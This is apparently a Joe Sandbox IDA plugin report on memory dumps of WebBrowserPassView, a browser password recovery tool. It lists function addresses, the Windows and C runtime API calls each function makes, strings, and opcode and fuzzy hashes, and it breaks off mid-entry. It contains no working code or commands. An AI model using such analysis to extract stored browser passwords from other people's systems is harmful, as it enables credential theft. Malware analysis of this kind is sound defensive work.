Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _memicmpwcslen
String ID: History
API String ID: 1872909662-3892791767
Opcode ID: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
Instruction ID: 941d79324f8edf167e3c65633afc17faa179ac8f5e09340cfeb8a5c916fb1dc6
Opcode Fuzzy Hash: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
Instruction Fuzzy Hash: EFF0A4725082018BD210EE298C41A2BF7E8DF813E9F11093FF8A1A62C2DB39DC4546ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A838 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSaveFileNameW.COMDLG32(?), ref: 0040A887
wcscpy.MSVCRT ref: 0040A89E

Strings

X, xrefs: 0040A86C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
Instruction ID: 6611e8cc3d156157abd2d980a6588325782f281802a6564c3fcb0580a52e3f25
Opcode Fuzzy Hash: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
Instruction Fuzzy Hash: 3201D3B2E002499FDF15DFE9D88479EBBF4EF08319F10842AE815E6280DB789949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E293 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E2AB
SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E2DA

Strings

", xrefs: 0040E2D3

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
Instruction ID: e50019999580a74d85a60b07338c936db99593caccc9844b50c561b4a2aa9bba
Opcode Fuzzy Hash: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
Instruction Fuzzy Hash: 3301D179800205EFDB209F9AC841AAFB7F8FF88745F01843EE855A6281E3349855CF79

Uniqueness

Uniqueness Score: -1.00%

Function 00401FEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?,?,?,?,004116D2,?,General,?,00000000,00000001), ref: 00402015
memset.MSVCRT ref: 00402028

Strings

WinPos, xrefs: 0040203B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
Instruction ID: 6104400570af448ab2160dad3ac02d8bcb917da1af1eef173e874a3fdbf9e1c7
Opcode Fuzzy Hash: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
Instruction Fuzzy Hash: 06F04F70600304AFEB14EF94C98DF5A33ACAF04700F14007AEA099B1C1D7F8A900CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 0040A81A
wcscpy.MSVCRT ref: 0040A828

Strings

X, xrefs: 0040A7FB

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileNameOpenwcscpy
String ID: X
API String ID: 3246554996-3081909835
Opcode ID: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
Instruction ID: 539f78c5397e7073aed27145bddffd849fb5fc534cbcdb44ae1ffce86d8eed53
Opcode Fuzzy Hash: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
Instruction Fuzzy Hash: 6C0162B1D0124C9FDB51DFE9D8856CEBBF4BF09318F10802AE819F6240EB7495458F55

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DF52
LoadStringW.USER32(hE,00000000,?,00001000), ref: 0040DF6A

Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D

Strings

hE, xrefs: 0040DF67

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$LoadString_itow
String ID: hE
API String ID: 2363904170-2023966264
Opcode ID: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
Instruction ID: 9b56b68215c9794ac37e938ab49c8f41abb91b806af26c10162807848ed08486
Opcode Fuzzy Hash: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
Instruction Fuzzy Hash: D8F08272D0022969F720A7459D4ABDFB79C9F05744F000076BB0CE1192D6649A44C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DC2F
_itow.MSVCRT ref: 0040DC3D

Part of subcall function 0040DBA3: memset.MSVCRT ref: 0040DBC8
Part of subcall function 0040DBA3: GetPrivateProfileStringW.KERNEL32 ref: 0040DBF0

Strings

hE, xrefs: 0040DC1C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$PrivateProfileString_itow
String ID: hE
API String ID: 1482724422-2023966264
Opcode ID: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
Instruction ID: 5887821bd48b257a389a8619214a73bf64326750db89a50052b3e3f26cdab3d4
Opcode Fuzzy Hash: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
Instruction Fuzzy Hash: 82E0BFB194030CF6EF10BBD1CC46F9D77BC6B05758F110425BA04A51C1E7B4A6598756

Uniqueness

Uniqueness Score: -1.00%

Function 00416D79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00416D91
FreeLibrary.KERNEL32(00000000,?,00406A8C,00000000), ref: 00416DA9

Strings

shlwapi.dll, xrefs: 00416D7B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID: shlwapi.dll
API String ID: 3150196962-3792422438
Opcode ID: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
Instruction ID: 8953b9299a98f99d53b06e6692452402a631d67aef832c0f4ad793a499166b8b
Opcode Fuzzy Hash: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
Instruction Fuzzy Hash: 77D01235205620AFD6516B26EC05AAF2AA5EFC2353B064035FC44D2251DB288C4A8669

Uniqueness

Uniqueness Score: -1.00%

Function 004173D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(0045EB90,00000000,00000001), ref: 004173DE
DeleteCriticalSection.KERNEL32(0045EAE8), ref: 004173F8

Strings

E, xrefs: 004173F2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CompareCriticalDeleteExchangeInterlockedSection
String ID: E
API String ID: 1152216905-2089609516
Opcode ID: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
Instruction ID: a08b94eee07b275f18df31a14d48185bcbd6fbf62116246691b6506a81ff28e0
Opcode Fuzzy Hash: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
Instruction Fuzzy Hash: 6DE0C23580123043DF249B355D08BC63764A701307F000433FF08E1593D3589DC8465E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A394 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
wcscpy.MSVCRT ref: 0040A3BA

Strings

XE, xrefs: 0040A39D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: DirectoryWindowswcscpy
String ID: XE
API String ID: 3999232144-3649240766
Opcode ID: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
Instruction ID: 4a4bab80cec1fde47f2faee4497fd5c8b1cbd1d111bef82ff05efc413ebbe1fc
Opcode Fuzzy Hash: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
Instruction Fuzzy Hash: EED0A732819350EFF309AB16FD4688637A4EB05331F10407BF801521A1E7B49E84C68E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E18E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194

wcsrchr.MSVCRT ref: 0040E197
wcscat.MSVCRT ref: 0040E1AD

Strings

_lng.ini, xrefs: 0040E1A7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
Instruction ID: 8b583429bb2f73c15531c1fc6ec83a8602d0f7af3b9842199d22d9f13e476b24
Opcode Fuzzy Hash: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
Instruction Fuzzy Hash: DBC0127668261020F12633226D03BAA02484F03709F25003BFC012E1C2ABAC56A240AF

Uniqueness

Uniqueness Score: -1.00%

Function 00416AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A

Strings

shell32.dll, xrefs: 00416AF0
SHGetSpecialFolderPathW, xrefs: 00416B04

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2773794195-880857682
Opcode ID: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
Instruction ID: 99dbe11720a893006f653479ba407f655e67b82aae680071a902f62ebf455638
Opcode Fuzzy Hash: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
Instruction Fuzzy Hash: 6BD0C7B1548311A9E7045B72BC097113654A711307F144077B800D2997EB78D9459F1D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D909 Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042D9AB
memcpy.MSVCRT ref: 0042D9E4
memset.MSVCRT ref: 0042D9FA
memcpy.MSVCRT ref: 0042DA33

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
Instruction ID: 22161e07a8dd0176d215964da5b89ff37004ec298054f59c146abe01b4a1168d
Opcode Fuzzy Hash: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
Instruction Fuzzy Hash: 635182B5E00219EFDF14EF55DC42AAEBBB5FF04340F55806AF904AA241E7389E50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E35C Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 0040A6FB: memset.MSVCRT ref: 0040A709

??2@YAPAXI@Z.MSVCRT ref: 0040E389
??2@YAPAXI@Z.MSVCRT ref: 0040E3B0
??2@YAPAXI@Z.MSVCRT ref: 0040E3D1
??2@YAPAXI@Z.MSVCRT ref: 0040E3F2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
Instruction ID: a8f70b2b8f0220c2fb0a7082b37bd867e83ef99612ffde3d47a64c7db78a1032
Opcode Fuzzy Hash: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
Instruction Fuzzy Hash: F521E6B0A117008FD7619F2B8444A15FFE8FF90310B2689AFD559CB2B2D3B8C450CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEF6 Relevance: 5.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040AF08

Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
Part of subcall function 00409FB3: memcpy.MSVCRT ref: 00409FE7
Part of subcall function 00409FB3: free.MSVCRT(00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FF0

free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF2E
free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF51
memcpy.MSVCRT ref: 0040AF75

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
Instruction ID: 62c255610b828a0a43b98215f9d769f251a011d3a86863779d24e99e918d36f1
Opcode Fuzzy Hash: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
Instruction Fuzzy Hash: C0218EB1100705EFD720EF18C88189AB3F4EF453247108A2EF9669B2D1C735F919CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404447 Relevance: 5.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040445E

Part of subcall function 004043D9: memcmp.MSVCRT ref: 004043F7
Part of subcall function 004043D9: memcpy.MSVCRT ref: 00404426
Part of subcall function 004043D9: memcpy.MSVCRT ref: 0040443B

memcmp.MSVCRT ref: 00404496
memcmp.MSVCRT ref: 004044C7
memcpy.MSVCRT ref: 004044E4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcmp$memcpy
String ID:
API String ID: 231171946-0
Opcode ID: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
Instruction ID: 50c4ff2e8450c3fce798df969388a048485be3917a12ccca82d2995326f9277d
Opcode Fuzzy Hash: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
Instruction Fuzzy Hash: 2B11A5F16003146AFB2026129C06F9A3758EB91758F10843FFF44641C2FABEA950566E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6F7 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B6FE
free.MSVCRT(00000000,00000FFF,00000000,00406D5E,?), ref: 0040B721

Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
Part of subcall function 00409FB3: memcpy.MSVCRT ref: 00409FE7
Part of subcall function 00409FB3: free.MSVCRT(00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FF0

free.MSVCRT(00000FFF,00000000,00406D5E,?), ref: 0040B752
memcpy.MSVCRT ref: 0040B77F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$memcpy$mallocstrlen
String ID:
API String ID: 3669619086-0
Opcode ID: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
Instruction ID: a2faa610dd64c27b0c2ef2c48459d55f7a4c7651722976a7707f5b611db7f3cc
Opcode Fuzzy Hash: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
Instruction Fuzzy Hash: C6115A716043059FD730AB18EC8192637A6EB8733AB24813BF9049B3A3C735D8148BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041933B Relevance: 5.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,00419CBA,?,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000), ref: 00419356
malloc.MSVCRT ref: 0041935E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000,00000000,?), ref: 00419375
free.MSVCRT(00000000,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000,00000000,?), ref: 0041937C

Memory Dump Source

